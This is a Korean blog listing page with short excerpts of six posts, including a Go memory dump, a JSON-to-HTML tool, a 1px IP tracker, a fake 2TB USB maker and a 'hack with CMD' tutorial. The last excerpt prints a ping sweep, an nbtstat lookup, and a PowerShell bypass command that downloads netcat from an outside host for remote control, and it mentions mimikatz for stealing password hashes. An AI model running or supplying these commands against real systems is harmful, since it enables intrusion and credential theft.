전체보기(151)
-
Golang Memory Dump 예제
C언어에서 hexdump 같은게 없을까 찾는 분께 도움이 되길 package main import ( "encoding/binary" "encoding/hex" "fmt" "log" "runtime" "strings" "unsafe" ) func main() { // Let's print out architecture and pointer size. This will help us in // understanding the memory layout later in the program. fmt.Printf("architecture: %s\n", runtime.GOARCH) var ptr uintptr ptrSize = int(unsafe.Sizeof(ptr)) fmt.Printf("pointer ..
2020.04.22 -
JSON to HTML
JSON Schema로 HTML 퍼블리싱을 해주는 사이트가 있다. Github : https://github.com/json-editor/json-editor 링크 : https://json-editor.github.io/json-editor/ JSON Schema를 아래처럼 넣고 Update Schema를 눌러보자 이렇게 웹형태로 나온다. Schema를 어느정도 커스텀해야 쓸만할듯 하다.
2020.03.29 -
어쨌든 이벤트 루프는 무엇입니까?
어쨌든 이벤트 루프는 무엇입니까? What the heck is the event loop anyway? 자바스크립트의 동기, 비동기, 콜백, 스택 등을 이해하기 유용한 영상
2020.03.29 -
상대방의 아이피를 알아낼 수 있을까? 1PX-IP-Tracker
이것은 1px 트래커 입니다. 이상해보이는 링크만 조심하면 될까요? IP 주소는 어떻게 알아낼 수 있을까요? 테스트 용도이기 때문에 리스트에 보여지는 아이피는 *로 대체됩니다. https://github.com/whackur/simple-1px-ip-tracker 해당 페이지로 가시면 여러분 자신의 ip가 있을 겁니다. http://pi.hakhub.net:82/tracker_list_for_me 불러오는 중입니다...
2020.02.19 -
가짜 2TB USB 만들기
유튜브 영상 링크 영상 링크 Dependency OS : Windows 64 bit Powershell Tested on Windows 10 Download Link #1 Google Drive Link Link #2 Warning!!!!!! Do not skip this. This program may be used for FUN OR EDUCATIONAL PURPOSES ONLY Do not abuse. All data will be lost. Make sure backup. It is not possible to use the increased capacity normally by increasing the capacity by fake. Do not connect or remove the devi..
2020.01.12 -
CMD로 해킹하는 7가지 방법
유튜브 영상 링크 YouTube www.youtube.com 1.ping으로 아이피주소 알아내기 2.ping으로 아이피주소 스캔하기 for /L %i in (0,1,255) do ping -n 1 -w 250 192.168.10.%i >> ipaddress.txt 3.상대방 호스트 이름 알아내기 nbtstat -A 192.168.10.1 4.파워쉘로 프로그램 받기, nc로 원격제어하기 powershell.exe -ExecutionPolicy ByPass -WindowStyle Normal (New-Object System.Net.WebClient).DownloadFile('http://program.com/nc.exe', 'nc.exe'); 5.해시와 패스워드 알아내기 mimikatz 다운로드 후 pri..
2019.12.28